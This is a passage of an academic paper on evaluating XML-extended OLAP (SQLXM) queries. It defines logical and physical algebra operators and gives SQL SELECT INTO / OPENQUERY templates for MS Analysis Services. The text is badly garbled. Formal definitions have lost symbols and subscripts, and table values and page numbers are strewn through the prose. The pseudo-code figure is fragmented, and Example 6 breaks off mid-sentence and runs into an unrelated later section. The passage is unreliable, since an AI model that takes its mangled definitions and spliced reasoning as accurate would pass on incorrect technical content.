LOGICAL ALGEBRA AND QUERY SEMANTICS In previous work (Pedersen et al., 2002), a logical algebra over federations was proposed, which is the basis of our work here. In this section, a brief background introduction to the logical algebra and the original SQLXM query semantics are given. We then propose a simplified version of the original query semantics. The following list summarizes the logical operators. •
•
2516
A decoration operator, δ, builds a virtual dimension using the XML data referenced by a level expression. The virtual dimension has the hierarchy in accordance with the cube semantics, which consists of the unique top level, the mid-level of external XML data, and the bottom level linking the measures and the decoration data. A federation selection, σFed, selects data in the federated cube according to user-defined conditions. The cube can have virtual
•
dimensions built from external data, which means that XML data also can be used in the filter. The cube schema is not changed. Only facts in the fact table are affected. The generalized federation projection, ΠFed, also let the federated cube be aggregated over the external XML data. Given a set of argument levels, the generalized projection first removes the dimensions in which no argument levels are present, and then each dimension value is rolled up to the specified level. Finally, facts in the fact table are grouped, aggregated measures are calculated, and other measures not specified in the arguments are removed.
The semantics of an SQLXM query can be expressed in terms of the algebra defined previously. In the following, suppose F = (C, Links, X) is a federation. {⊥p, ..., ⊥q} ⊆ {⊥1, ..., ⊥n} and {ls, ...lt} are levels in C such that ⊥s s ls ∧ ⊥s ≠ ls, ..., ⊥t i lt ∧ ⊥p ≠ lt. le is used to represent a level expression, l[SEM]/link/xp, where SEM is the semantic modifier, l is a level in C, link ∈ Links is a link from l to documents in X, and xp is an XPath expression. predwhere represents the predicates in the WHERE clause. predhaving represents the predicates in the HAVING clause. LEΠ = {leuΠ, ..., levΠ} are the level expressions in the SELECT and GROUP BY clause. LEσwhere are the level expressions in the WHERE clause. LEσhaving are the level expressions in the HAVING clause. f x, ..., f y are the aggregation functions. A sequence of decoration operations is denoted by Δ; that is, Δ{lei, ..., lej} (F) = δlei(...(δlej(F))...). Here is a prototypical SQLXM query: SELECT f x(M x), ..., f y(My), ⊥p, ..., ⊥q, ls(⊥s), ..., lt(⊥t), leuΠ, ..., levΠ FROM F WHERE predwhere GROUP BY ⊥p, ..., ⊥q, ls(⊥s), ..., lt(⊥t), leuΠ, ..., levΠ HAVING predhaving
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
which can be represented in the following logical algebra (Pedersen et al., 2002), ΠFed[⊥p, (σFed[predhaving] ..., ⊥q, ls(⊥s),...,lt(⊥t),leuΠ,...,levΠ] (ΔLEσhaving(ΠFed[⊥p, ..., ⊥q, ls(⊥s), ..., lt(⊥t), leuΠ, ..., levΠ] semantics implies that an SQLXM query can be evaluated in four major steps. First, the cube is sliced as specified in the WHERE clause, possibly requiring decorations with XML data. Second, the cube is decorated for the level expressions in the SELECT and GROUP BY clauses, and then all dimensions, including the new ones, are rolled up to the levels specified in the GROUP BY clause. Third, the resulting cube is sliced according to the predicate in the HAVING clause, which may require additional decorations. Fourth, the top generalized projection projects the decorations not required by the SELECT and GROUP BY clause and gives the final result cube. The following section introduces a simplified representation of the query semantics.
SIMPLIFIED QUERY SEMANTICS The query semantics have a great impact on the initial plan, as the semantics take the form of a logical query tree after an SQLXM query is parsed and analyzed. As the semantics indicate, duplicate decoration operators are generated when a level expression exists in several subclauses (e.g., the SELECT and the WHERE clauses). As the algebra shows, an operator takes an input federation and generates a new one. Thus, repeated operators then can be detected by examining the input and output federations. The simplified query semantics can be constructed by removing the redundant operators that do not change the cube semantics. An operator that generates the same federation as the input federation is redundant. Thus, the plan without redundant operators is more compact and sometimes considerably smaller than the unsimplified version. This simplification benefits the performance
of the query processing. First, during the query optimization, the equivalent plans in the plan space can be enumerated much faster. Intuitively, this process can be thought of as the combinations of operators. The fewer operators a plan has, the fewer combinations it results in. Second, smaller plans lead to less logical-to-physical conversion and cost-estimation time. Third, during evaluation, no duplicate data is retrieved, thereby leading to high reusability and, more importantly, less resource consumption (e.g., CPU, I/O, and storage). The simplified algebraic query representation is σFed[predhaving](ΠFed[⊥p, ..., ⊥q, ls(⊥s), ..., lt(⊥t), leuΠ, ..., (ΔLEΠ,δ(σFed[predwhere](ΔLEσwhere(F))))). levΠ] Here, LEΠ,δ is a set of the decoration operators that are referenced by the SELECT and GROUP BY clauses only; that is, LEΠ,δ ⊆ LEΠ ∧ LEΠ,δ ∩ LEσwhere = ∅. Moreover, an instance of a decoration operator for a specific level expression is unique. In other words, when a virtual dimension for a level expression already exists in the federation, no decoration operator building the same dimension is needed again. Therefore, some of the decoration operators for the WHERE clause may build the virtual dimensions required by the SELECT and GROUP BY clauses as well; that is, LEΠ \ LEΠ,δ ⊆ LEσwhere. Δpredhaving is removed, because predicates on level expressions in the HAVING clause can be put in the WHERE clause. The original top generalized projection also is removed, because
Figure 6. The initial logical query plan
2517
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
the HAVING clause does not change the cube schema. The simplified logical plan tree for the query in Figure 4 is shown in Figure 6, where only one decoration, δN[ANY] / Nl / P, exists below the federation selection, although referenced by two federation operators. The next section presents the physical algebra modeling the execution of federation queries.
PHYSICAL ALGEBRA As shown in Figure 5, an execution plan is produced by the query optimizer, which is used to guide the evaluator about when, where, and how the data retrieval and manipulation operations should be performed. An execution plan is an SQLXM query tree expressed in the physical algebra. The logical semantics of a query imply the main phases of the query evaluation, whereas a physical query tree is integrated with more detailed evaluation operations. In this section, we introduce the new physical algebra operators and the new semantics of the existing federation operators and show an example of a logical plan and its corresponding physical plan. The federation decorates OLAP data in the temporary component using the decoration XML data, which then enables selections and aggregations over the decorated temporary fact data. Therefore, the temporary component plays an important role at evaluation time. Before we describe the physical operators, we extend the original federation to an extended form, on which
our physical algebra is based. An extended federation is FTC,ext = (C, Links, X, T), where C is a cube, Links is a set of links between levels in C and documents in X, and T is a set of temporary tables.
Querying the OLAP Component Cube operators include cube selection and cube generalized projection. They are used to model the OLAP component query, which is used to retrieve the cube data from the OLAP database. The cube selection operator σCube is much like a logical federation selection operator but has no references to level expressions in the predicates. A cube selection only affects the tuples in the fact table, thereby returning a cube with the same fact type and the same set of dimensions.
Example 1 Suppose the extended federation Fext has the cube schema and the fact table in the example cube, TC. The cube selection operator σCube[Supplier = ‘S1’ OR (F ) = F′TC,ext slices the cube so that Supplier = ‘S2’] TC,ext only the data for the suppliers S1 and S2 in the fact table are retained. The resulting fact table is shown in Table 2.
Definition 1. Cube Selection Let Fext = (C, Links, X, T) be an extended federation, and let θ be a predicate over the set of levels {l1, ..., lk} and measures M1, ..., Mm. A cube selec-
Table 2. The fact table after selection Quantity
2518
ExtPrice
Supplier
Part
Order
Day
17
17954
S1
P3
11
2/12/1996
36
73638
S2
P5
18
5/2/1992
28
29983
S2
P4
42
30/3/1994
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
tion is σCube[θ](Fext) = (C′, Links, X, T) , where the cube is C′ = (N, D, F′), and the new fact table is F′ = {t′1, ..., t′l}. If ti = (e⊥1, ..., e⊥n, v1, ..., vm) ∈ F is an input fact tuple, then the corresponding fact tuple in the output fact table is t′i = ti if θ(ti) = tt; otherwise, t′i = (e⊥1, ..., e⊥n, NULL, ..., NULL). The cube generalized projection operator ΠCube rolls up the cube, aggregates measures over the specified levels, and at the same time removes unspecified dimensions and measures from a cube. Intuitively, it can be looked at as a SELECT statement with a GROUP BY clause in SQL. The difference between a cube and a federation generalized projection operator is that the first one does not involve external XML data or level expressions and is executed in the OLAP component. Intuitively, the levels specified as parameters to the operator become the new bottom levels of their dimensions, and all other dimensions are rolled up to the top level and removed. Each new measure value is calculated by applying the given aggregate function to the corresponding value for all tuples in the fact table containing old bottom values that roll up to the new bottom values. To ensure safe aggregation in the case of non-strict hierarchies (e.g., a dimension value has two parent values), we explicitly check for this in each dimension. If a roll-up along some dimension duplicates facts, we disallow further aggregation along that dimension by setting the aggregation type to c.
Example 2 Suppose the extended federation FTC,ext has the cube schema and the fact table in the example cube, TC. The cube generalized projection operator ΠCube[Supplier] (FTC,ext) = F′TC,ext rolls up the cube to the level Supplier and calculates the Quantity per Supplier. After the projection, only the measure Quantity and the dimension Suppliers are retained, of which the bottom level is Supplier. The result fact table is shown in Table 3.
Definition 2. Cube Generalized Projection Let Fext = (C, Links, X, T) be an extended federation. Let li1, ..., lik be levels in C such that, at most, one level from each dimension occurs. The measures {Mj1, ..., Mjl} ⊆ {M1, ..., Mm} are kept in the cube, and f j1, ..., f jl are the given aggregate functions for the specified measures, such that ∀ D′g ∈ {Dg ⏐ Dg ∈ D ∧ ⊥g ∉ {li1, ..., lik}} ∀ f jh ∈ {f j1, ..., f jl}( f jh ∈ AggType(Mjh, D′g)), meaning that the specified aggregate functions are allowed to be applied. The cube generalized projection operator ΠCube over a cube C is then defined as: ΠCube[li1, ..., lik] ext F′), and D′ih = (L′Dih, E′Dih) for h ∈ {1, ..., k}. The new poset of levels in the remaining dimensions is L′Dih = (LS′ih, ′ih, ih, lih), where LS′ih = {lihP ⏐ lihP ∈ LSih ∧ lih ih lihP}, and ′ih = ih⏐LS′ih. Moreover, , where Lih is the set of dimension values of the level lih. The new fact table is F ′ = {(e⊥′ ,…, e⊥′ , v′j ,…, v′j ) | e′ ⊥ ∈ Li ∧ v′ j = f M ({v (e⊥1, ..., e⊥n, v) ∈ M jh ∧ (e⊥′ i ,…, e⊥′ i ) ∈ Roll − k 1 up ⊥ (e⊥ , li ) × … × Roll − up ⊥ (e⊥ , li )})}. Furthermore, the aggregation type is set to c by AggType( ) = c if ∃(e⊥ ,…, e⊥ , v j ) ∈ M j ∃e ∈{e⊥ ,…, e⊥ } (|| Roll − up ⊥ (e, li ) ||> 1 ∧ v j ≠ NULL). i1
Table 3. The fact table after the cube generalized projection
i1
i1
ik
Supplier
ik
17
S1
64
S2
2
S3
26
S4
ig
ig
l
1
1
Quantity
1
n
ik
h
g
jh
k
h
1
n
g
Data Transfer Between Components This section presents the definitions of fact-, dimension-, and XML-transfer operators. These
2519
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
operators are used to transfer data between components. The fact-transfer operator transfers fact data from the OLAP to the temporary component, whereas a dimension-transfer operator only transfers dimension data. An XML-transfer operator connects the temporary and XML components, transferring the referenced XML data into a temporary table. In a physical execution plan, the fact-transfer operator is above the cube and below the federation operators. The resulting fact data from the cube operators are transferred to the temporary component through the fact-transfer operator. Thereafter, SQL operations (e.g., selections and joins) can be performed over the temporary fact table.
Definition 3. Fact Transfer Let Fext = (C, Links, X, T) be an extended federation. The fact-transfer operator is φ(Fext) = (C, Links, X, T′), where T′ = T ∪ {RF}, and R F is the copy of the fact table in the temporary component. When a non-bottom level is referred by the federation operations in the temporary component, dimension values of the non-bottom level are required. The dimension transfer operator ω is used at this time to load the dimension values for the given dimension levels into a table in the temporary component, which then can be used by federation selection and generalized projection operators.
Table 4. The temporary table for nation and supplier
2520
Nation
Supplier
DK
S1
DK
S2
CN
S3
UK
S4
Example 3 A roll-up expression, Nation(Supplier), yields a dimension transfer. The two input parameters are Nation and Supplier. The dimension values for the two levels are loaded into a temporary table R1 shown in Table 4.
Definition 4. Dimension Transfer Let Fext = (C, Links, X, T) be an extended federation, where the cube is C = (N, D, F). Let lix, liy be two levels in dimension Di, where lix i liy and lix ≠ liy. The dimension-transfer operator is defined as: ω[lix, liy](Fext) = (C, Links, X, T′), where T′ = T ∪ {R}, R = {(eix, eiy) ⏐ eix ∈ Lix ∧ eiy ∈ Liy ∧ eix Di eiy}. In the following, a temporary table for lix and liy by a dimension-transfer operator is denoted . The temporary table R1 in Example 3 as: can be denoted as Rω[Supplier, Nation]. According to the definition, the temporary component T′ has a new element, Rω[Supplier, Nation]. At query evaluation time, the XML data is needed in the temporary component to allow decoration, grouping, or selection on the cube according to the referenced level expressions. Intuitively, the XML-transfer operator connects the temporary component and the XML component, transferring the XML data into the temporary component. The input parameter is a level expression, which specifies the dimension values to be decorated, the corresponding decoration XML values selected by the relative XPath expression, and the link in the level expression. The operator yields a new table in the temporary component.
Definition 5. XML Transfer Let Fext = (C, Links, X, T) be an extended federation, where C = (N, D, F). Let lz[SEM]/link/xp be a level expression, where lz ∈ Dz, link ∈ Links is a link from lz to X, and xp is an XPath expression
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
over X. The XML-transfer operator is defined as (Fext) = (C, Links, X, T′), where T′ = T ∪ {R}. Here, R has the schema (lz, lxp) and is the temporary table containing the decorated dimension values and the decoration XML values found through the XML documents with the decoration semantics specified by the semantic modifier SEM. At evaluation time, the ALL semantics yield the temporary table having multiple rows with the same dimension value but different decoration values, whereas the table for the ANY semantics has only one row for a dimension value and an arbitrary decoration value linked through the level expression. Similarly, a dimension value decorated with the CONCAT semantics also takes up one row, but the decoration column is the concatenation of all the decoration values. In the and defined following, R is denoted as = formally as
• • •
{(ez, exp) ⏐ ∀ (ez, s) ∈ link(∀ s′ ∈ xp(s)(exp = StrVal(s′)))}, if SEM = ALL. {(ez, exp) ⏐ ∃ (ez, s) ∈ link(exp = StrVal(s′) for some s′ ∈ xp(s))}, if SEM = ANY. {(ez, exp) ⏐ (ez, s) ∈link ∧ exp = Concat(StrVal(s1), ..., StrVal(sk)) ∧ si ∈ Sez}, where Sez = {s ⏐ ∀ (e, s′) ∈ link(s ∈ xp(s′))}, for each ez ∈ Lz, if SEM = CONCAT.
Example 4 The operator τNation[ANY]/Nlink/Population(FTC,ext) generates F′TC,ext = (C, Links, X, T′), where T′ contains a new temporary table RτNation[ANY]/Nlink/Population. The
Table 5. The temporary table for nation and population Nation
Population
DK
5.3
CN
1264.5
UK
19.1
table has two columns: one for the dimension values of Nation and the other for the decoration values Population. A decoration value is the string value of a Population node in the context of the XML nodes in Nlink . Each nation has one and only one population, as specified by the decoration semantics ANY. The result temporary table RτNation[ANY]/Nlink/Population using the XML data from Figure 2 is shown in Table 5.
Querying the Temporary Component This section presents the definitions of the operators that are performed in the temporary component. They are decoration, federation selection, and generalized projection operators, which allow the OLAP data to be decorated, selected, and grouped by the external XML data. The cube is decorated in the temporary component using the decoration operator δ. The operator generates a decoration dimension, which is derived according to the cube definition, that the fact table contains the bottom levels of all dimensions. Therefore, the new dimension has the unique top level, and the middle decoration level and the bottom level of the dimension contain the decorated level. Therefore, the new dimension has the same aggregation type as the referred dimension with each measure. Values of the levels are derived from a temporary decoration dimension table, which is composed of the decoration values and the bottom values of the referred dimension. Moreover, since the cube definition does not allow duplicate dimensions, no changes are made if an identical dimension already exists in the cube. At evaluation time of the decoration operator, the temporary table created by the XMLtransfer operator and having the same input level expression is used. The new dimension follows the same decoration semantics specified by the level expression. Correct aggregations on such a decoration dimension is ensured by the federation generalized projection operator in Definition 8. A physical decoration operator may have more
2521
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
Figure 7. The decoration dimension and the temporary decoration dimension table supplier/population Supplier
than one child operator, which could be an XMLtransfer operator with the same level expression as the input parameter, thereby providing the XML data in a temporary table.
Example 5 The decoration operator for Nation[ANY]/Nlink/ Polulation generates a decoration dimension containing the top level , the middle level Population, and the bottom level Supplier, which is the bottom level of the dimension having the starting level Nation. The dimension values are derived from the result of a SQL inner join on the temporary tables of Examples 3 and 4. The dimension hierarchy is strict, since a supplier in a nation only has one corresponding population number. Figure 7 shows the dimension hierarchy and the temporary dimension table.
Definition 6. Decoration Let Op1, ..., Opn be the child operators of a decoration operator δlz[SEM]/link/xp and (C, Links, X, T1), ..., (C, Links, X, Tn) be their output federations, where C = (N, D, F). Let lz[SEM]/link/xp be a level expression, where lz ∈ Dz, link ∈ Links be a link from lz to X, and xp be an XPath expression over X. The physical decoration operator is defined as δlz[SEM]/link/xp(Fext) = (C′, Links, X, T′), where Fext
2522
Population
S1
5.3
S2
5.3
S3
1264.5
S4
19.1
= (C, Links, X, T) is the input, and T = T1 ∪...∪ Tn is the union of the temporary tables from the child operators. In the output federation, T′ = T ∪ {RDn+1}, RDn+1 is a temporary decoration dimension table holding the dimension values of the bottom level ⊥ z and the XML level lxp; in addition, n is the number of the existing dimensions prior to the ∈T decoration. More precisely, suppose is a temporary table loaded by an XML-transfer is a temporary table loaded operator and by a dimension-transfer operator; then, R Dn+1 = if lz = ⊥ z, meaning that the table yielded by the XML-transfer already contains the required data and can be used directly. Otherwise, ) if ⊥ z z lz and R Dn+1 = π⊥z, lxp( ⊥ z ≠ lz, where π is the regular SQL projection, and is the natural join. The resulting cube is given by C′ = (N, D′, F), where D′ = {D1, ..., Dn} ∪ {Dn+1} and Dn+1 = {LDn+1, EDn+1}. Here, LDn+1 = (LSn+1, n+1, n+1, ⊥n+1), where LSn+1 = { n+1, lxp, ⊥n+1}, n+1 = {(⊥n+1, lxp), (lxp, n+1), (⊥n+1, n+1)}, and ⊥n+1 = ⊥ z. The poset of dimension values is {ei, ej} ∪ { n+1}, Dn+1), where Dn+1 = {(e⊥n+1, exp) ⏐ (e1, e2) ∈ R Dn+1 ∧ e⊥n+1 = e1 ∧ exp = e2} ∪ {(e⊥n+1, n+1) ⏐ (e1, e2) ∈ R Dn+1 ∧ e⊥n+1 = e1} ∪ {(exp, n+1) ⏐ (e1, e2) ∈ R Dn+1 ∧ e⊥n+1 = e2}. For each measure M h in M, the aggregation type of Dn+1 is AggType(M h, Dz). Intuitively, the physical federation selection operator σFed is an SQL selection over the join of
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
where C = (N, D, F). Let θ be a predicate over the levels in C. The federation selection operator is defined as σFed[θ](Fext) = (C′, Links, X, T′), where Fext = (C, Links, X, T) is the input, and T = T1 ∪...∪ Tn is the union of the temporary tables from the child operators. In the output federation, T′ = T \ {R F} ∪ {R′F} means that the temporary fact table RF is replaced by R′F. The resulting cube is C′ = (N, D, F′), where the new fact table is F′ = {ti ⏐ ti ∈ R′F}. Suppose Sθ is the set of levels referenced by θ, then R′F = σθ (R F), if S θ = {⊥1, ..., ⊥l}, meaning the predicates only contain the bottom levels. Otherwise, if Sθ has roll-up or level expressions; that is, {lx(l⊥x), ..., ly(l⊥y)} ⊆ S θ, and {lu[SEMj]/linkj/xpj, ..., lv[SEM k]/linkk/xpk} ⊆ Sθ, then R′F = RF′ = RF .∗ RF R [ ⊥x ,lx ] ... R [ ⊥ y ,l y ] R l [ SEM ]/link / xp ... R l [ SEM ]/link / xp )). u j j j v k k Similar to the federation selection, the federation generalized projection operator ΠFed is also implemented as a SELECT statement over temporary tables. Specifically, a roll-up operation is a join between the fact table and the temporary table containing the bottom level and the target level, where the common bottom level is the key of the join. Likewise, showing the decoration values together with OLAP values in the result also can be seen as a roll-up from the bottom level to the decoration level of a decoration dimension. Finally, an SQL aggregation calculates the given aggregate functions of the measures over the grouped facts according to the SELECT and GROUP BY arguments. Note that when performing roll-up operations, correct aggregation must be ensured by detecting hierarchy strictness
several tables, including the fact table, decoration dimension tables, and temporary dimension tables for non-bottom levels referenced by the predicate. Similar to the cube selection, the federation selection returns a cube with the same fact types and the same set of dimensions and only affects the tuples of the fact table in the temporary component. A federation selection operator may have several child operators (e.g., dimension-transfer and decoration operators) to provide the values required by the predicate. The temporary tables produced by the child operators are collected and will be used in the join.
Example 6 Suppose the temporary fact table in FTC,ext is the copy of the fact table in Table 1. For the federation selection operator over FTC,ext, σFed[Nation[ANY]/Nlink/ (F ), the decoration values, PopulaPopulation nodes that are not included in Nlink, ensuring that only the interesting data is copied.
Inlining An inlining operator first uses the ADO Recordset objects to load the decoration values from the temporary tables into main memory, rewrites the predicates, and then replaces all the occurrences of the rewritten predicates with the new predicates. The pseudo-code in Figure 12 shows the transforming function for rewriting predicates. Here, the data type of the predicates is String as in Java. A new predicate can be constructed by connecting several subpredicates with the operator “+”, which is similar to the binary string operator in Java. The input θi is a parameter of the inlining operator, ι[θ1, ..., θn] and bo and the predicate operator po are as defined in Definition 9. The possible forms of θi are listed in Definition 9. Each form is handled with the appropriate procedure, which generally is performed in two steps: first, the required data for θi is retrieved, and then the new predicate θ′i is constructed for the respective form. For form 1 of θi, where a constant is involved, the predicate can be evaluated partially on the
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
Figure 12. Transforming the predicates String rewritePredicate(String θi) 1)
{
2)
declare the new predicate
3)
switch(the form of θi)
4)
{
5)
′ as an empty string;
i
case 1:
6)
retrieve ez’s in all the pairs (ez , exp) from the temporary table such that “ exp evaluates to true;
7)
construct
8)
break;
9)
case 2:
10)
case 3:
11)
construct
13)
”
′ according to Definition 9;
i
retrieve all the
12)
po K
(ez , exp )
pairs in the temporary table;
′ for the respective form; i
break;
14)
case 4:
15)
retrieve ezi and ewi in all the tuples
(ezi , exp1i , ewi , exp2i )
(ezi , exp1i , ewi , exp2i ) ∈ Rôl [ SEM ] /link /xp × R l z
16)
construct
17)
break;
18)
1
1
′ according to Definition 9;
w [ SEM ] /link2 /xp2
such that
and “ exp i 1
po exp2i ” evaluates to true;
i
case 5:
′=rewritePredicate(“ lz [ SEM ]/link /xp = K1 ”)+“ OR ”+ …+“ OR ”+
19)
i
rewritePredicate(“ l z [ SEM ]/link /xp 20)
break;
21)
case 6:
′=“NOT ”+rewritePredicate(
22)
i
23)
case 7:
25)
27) 28)
);
i1
break;
24)
26)
= K n ”);
′
i =rewritePredicate(θi1)+“
po ”+rewritePredicate(θi2);
} return
′;
i
}
temporary table, meaning that the decoration XML data is compared with the constant, and only the dimension values paired with the satisfying decoration values are retrieved. Similarly, a predicate in form 4 first can be evaluated partially
on a Cartesian product of the two temporary tables and , before the new predicate is constructed. For forms 2 and 3, the predicates cannot be evaluated, and all the dimension values of lz and the decoration values must be retrieved in
2529
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
order to construct the new predicate with the names of the involved level and measure, respectively. For the rest of the forms, the rewritePredicate function is called recursively to construct first the component predicates of θi.
Cube Selection and Cube Generalized Projection The cube operators use the OLAP component queries to select and to aggregate the cube, which, in the current implementation, is the abbreviated SQL SELECT statement supported by MS Analysis Services, although as two different operators, the cube selection and generalized projection operators only construct one entire OLAP query. That is, the selection operator generates the WHERE clause with the parameter as the argument predicate, whereas the projection operator forms the other clauses (e.g., the SELECT and GROUP BY clauses) with the specified levels and aggregate functions as arguments. Generally, the operators in the form ΠCube[L](σCube[θ](Fext)) construct the following query, where N is the name of the cube C in Fext = (C, Links, X, T). SELECT F(M), L FROM N WHERE θ GROUP BY L
The same query also is used for the operators in the form σCube[θ](ΠCube[L](Fext)). Note that the HAVING clause is not supported due to a limitation in Analysis Services. Therefore, the predicate θ only can reference basic measures. The selection on aggregated measures is performed in the temporary component by a federation selection (see the following), which is not a noticeably expensive alternative, because the fact tuples copied into the temporary component already are aggregated and reduced by the OLAP query. If no cube selection operator exists in the plan, the WHERE clause no longer is required;
2530
otherwise, if several selection operators exist, the predicates then are combined into one predicate. If no cube generalized projection operators exists in the plan, the SELECT clause will select everything, which is a “*” argument. However, only one cube generalized operator can exist in a query plan, because during plan optimization, the equivalent plans are pruned such that the plans having multiple cube generalized projection operators are removed, and only the plan with the top cube generalized projection operator is retained. The reason is that the top projection always aggregates the cube to the same levels, no matter how many cube generalized projection yielding low-level aggregates exist below, and intermediate cubes should try to be avoided to save the execution time.
Fact Transfer The fact-transfer operator copies the fact data into the temporary component using a pass-through query, which is an SQL SELECT INTO statement extended by the MS TransactSQL function OPENQUERY (Microsoft, 2002a), where one of the parameters is the query constructed for the cube operators described previously. Generally, the fact transfer over the cube operators is in the form φ(ΠCube[L](σCube[θ](Fext))), which leads to the following query, where OLAP_SVR is the OLAP component. Note that the outer SELECT statement contains a GROUP BY clause, and the SELECT clause repeats the arguments of the inner SELECT clause, F(M) and L (see Box 1). As stated by the article (Microsoft, 2002a), because there is a limitation in Analysis Services that causes GROUP BY and DISTINCT queries to produce multiple rows that satisfy the grouping and/or distinct functions (instead of just one), it is necessary to reduce the tuples by coalescing the returned tuples from the OPENQUERY function in the temporary component. For example, in the following query, the result set of the inner OLAP query is a union of the results of the OLAP
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
Box 1. SELECT
F( M ),
L
INTO
tmp_facts
FROM
OPENQUERY(
GROUP BY
OLAP_SVR, SELECT
F (M ) , L
FROM
N
WHERE
θ
GROUP BY
L)
L
Box 2. SELECT
SUM(Quantity), Customer
INTO
tmp_facts
FROM
OPENQUERY(
GROUP BY
OLAP_SVR, SELECT
SUM(Quantity), Customer
FROM
TC
WHERE
Nation=‘DK’ OR Nation=‘UK’
GROUP BY
Customer)
Customer
queries using the predicates Nation=‘DK’ and Nation=‘UK’ in the WHERE clause individually; therefore, the outer query must perform an aggregation in the temporary component to coalesce the rows returned for the same grouping values (i.e., Customer) (see Box 2). Therefore, the general form of the constructed OLAP query guarantees the correctness of the aggregation. However, the temporary aggregation can be avoided, if the grouping values for the returned subsets are disjoint. For example, the predicates in the following query construct two disjoint sets of values for the grouping attributes Customer and Nation; therefore, the union of the result sets can be inserted directly into the temporary fact table (see Box 3).
For a query plan without both cube selection and generalized projection operators, the following query which does not perform any aggregations in the OLAP component is used, because no OLAP data is required to be selected and aggregated (see Box 4). The SELECT INTO statement is executed in the temporary component, whereas the OPENQUERY function sends the SQL command to the OLAP component and returns the requested data to the outer SELECT INTO query, which then inserts the fact data into a temporary fact table. Therefore, cube selection and generalized projection operators are not evaluated against the OLAP cube until the fact-transfer operator is reached.
2531
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
Box 3. SELECT
*
INTO
tmp_facts
FROM
OPENQUERY(
OLAP_SVR, SELECT
SUM(Quantity), Customer, Nation
FROM
TC
WHERE
Nation=‘DK’ OR Nation=‘UK’
GROUP BY
Customer, Nation)
Box 4. SELECT
*
INTO
tmp_facts
FROM
OPENQUERY(
Dimension Transfer The dimension-transfer operator is basically a special fact-transfer operator that copies OLAP data into the temporary component. However, unlike the regular fact transfer, it only copies dimension values rather than the fact data. The query nested into the OPENQUERY function is a SELECT statement that retrieves the dimension values for the two levels lix and liy specified by ω[lix, liy]. The entire SELECT INTO query is in the following general form, where tmp_dimi is the temporary table’s name. Note that the outer SELECT clause
OLAP_SVR, SELECT
*
FROM
N
)
performs an additional DISTINCT operation on the data retrieved by the OPENQUERY function. This is due to the same reason as the additional GROUP BY clause in the query constructed by the fact-transfer operator. The extra DISTINCT operation ensures the correctness of the result (see Box 5).
Decoration A decoration operator δlz[SEM]/link/xp uses a SQL SELECT INTO statement to create a decoration dimension table defined as R Dn+1 in Definition 6,
Box 5. SELECT INTO FROM
DISTINCT * tmp_dim i OPENQUERY(
OLAP_SVR, SELECT DISTINCT FROM
2532
lix , liy N
)
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
containing the data for the bottom level ⊥ z and the middle level lxp of the decoration dimension. If the starting level lz of the level expression lz[SEM]/link/xp is the bottom level ⊥ z, then the values of the two levels lxp and ⊥ z are the data yielded by the level expression through an XMLtransfer operator, τlz[SEM]/link/xp, which loads the data as defined in Definition for lz and lxp into is used as the 5. In this case, the table decoration dimension table. If lz ≠ ⊥ z, then the table created by the dimension-transfer operator to yield ω[⊥z, lz] must be used to join with the right dimension table. Therefore, the following SQL query is used, where tmp_dim xp is the decoration dimension table.
If the predicate θ references a regular dimension level liy higher than the level lix from the same dimension in the temporary fact table, a temporary dimension table Ri(lix, liy) created by the dimension-transfer operator ω[lix, liy] is required. In this case, lR1Ri is the lower level lix, which exists in both R1 and Ri. If Rj(⊥ z, lxp) is a decoration dimension table created by the decoration operator δlz[SEM]/link/ , and if the level expression lz[SEM]/link/xp is xp referenced by θ, then lR1Rj is ⊥ z which also exists in the fact table and represents the bottom level of the decoration dimension. If no roll-up or level expressions are involved in the selection, then n = 1, meaning that the selection can be performed directly on the temporary fact table.
SELECT ⊥z, lxp INTO tmp_dimxp FROM AS R1, WHERE R1.lz = R2.lz
Federation Generalized Projection AS R2
Federation Selection As shown in Example 6, a federation selection operator uses a SQL SELECT query to filter the facts in the temporary fact table. Since a federation selection operator does not change the fact types, the SELECT clause selects all the columns using the “*” expression. A new temporary table is specified by the INTO clause with the table name. When data in dimension tables (including the decoration dimension tables) are involved in the select condition, as in Example 6, the tables containing the requested data must be joined with the temporary fact table, yielding the WHERE clause containing the join predicates and the selection predicate θ. The SQL query for a federation selection σθ is shown next, where R1 is the temporary fact table, and lR1Ri is the common attribute of the tables R1 and Ri. SELECT INTO FROM WHERE
* tmp_fact R1, ..., Rn R1.lR1R2 = R2.lR1R2 AND ... AND R1.lR1Rn = Rn.lR1Rn AND θ
A federation generalized projection operator also is implemented using an SQL SELECT statement. Similar to the query constructed for a federation selection, the FROM clause also contains the tables having the requested data by the generalized projection operator. The only difference is that the WHERE clause is not needed, but the arguments of the SELECT clause are, instead, the levels and aggregate functions specified by the parameters. The general form of the query for the operator ΠFed[L] is shown next, where F(M) represents the aggregate functions on the specified measures, and L are the levels to which the cube is aggregated. The participating tables R1, ..., Rn are the same as defined for the federation selection operator. F(M), L tmp_fact R1, ..., Rn R1.lR1R2 = R2.lR1R2 AND ... AND R1.lR1Rn = Rn.lR1Rn GROUP BY L
SELECT INTO FROM WHERE
To reduce the temporary intermediate tables, we try to evaluate the SQL queries in batch-mode or to reconstruct them into one, although each
2533
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
F(M), L tmp_fact R1, ..., Rn R1.lR1R2 = R2.lR1R2 AND ... AND R1.lR1Rn = Rn.lR1Rn AND θ GROUP BY L
SELECT INTO FROM WHERE
Figure 13. Plan evaluation example
If there is a federation selection operator σFed[θM] referencing aggregated measures above the federation generalized projection operator, the HAVING clause, HAVING θM, must be added to the previous query.
Example 10
SQL query constructed by a federation selection or a generalized projection operator in a plan is itself executable against the existing temporary tables. For example, when a query constructed for a federation selection is returned to the above federation generalized projection operator, the WHERE clause is taken out and combined with the WHERE clause of the query for the generalized projection, and all the tables required by the two operators are included in the FROM clause. The general form for such two operators is ΠFed[L (σ (F )), yielding the following: ] Fed[θ] ext
